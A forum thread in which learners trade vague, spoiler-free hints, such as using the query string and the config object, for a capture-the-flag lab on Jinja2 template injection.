Forum Discussion

CyberSharpe's avatar
CyberSharpe
Icon for Silver I rankSilver I
3 months ago
Solved

Pen Test CTFs: Jinja2 Exploitation

Good morning Team,  This one has my head spinning and i feel like im tickling the method but not quite pulling it off. "Jinja2 is a templating engine for Python. It's often used with Flask web ap...
offensive cyber
  • CyberSharpe's avatar
    CyberSharpe
    3 months ago

    Team,

    Thank you for reaching out in some manner. The lab is surprisingly straightforward.... once you understand the vulnerability. Over the past week, this has been my soul focus and what I have learnt is so valuable.

    With regards to the CTF itself, the questions truly lead you to the answer. I had most of the answers but i had to work out how to use them and for that, I had to understand them. I spent so long punished by the limited characters and adding the 'space', that I didn't even think of using the answer to 'module.function' . 

    Then it clicked. 

    What could of been a 20 minute adventure has lead to some serious research and a real sense of achievement.

    I can't say the answers were solutions but certainly honorable suggestions:

    Netcat's - 

    most likely the answer lies in question "8 What Python module and function allows you to access arguments in the query string?

    Steven's - 

    learn, how you can access the config register

    Config, Strings, Objects and Variables for the win.

steven's avatar
steven
Icon for Silver II rankSilver II
3 months ago

puuuh... hard to tell you, without telling you :)
what will help you is for sure: google for jinja2 template exploits. learn, how you can access the config register, etc. 

later you'll find out that you'll be limited (see Q2) and find a way around the issue.

here's my linklist what I've read to solve this lab:

This might give you some indications, how to tacke the lab.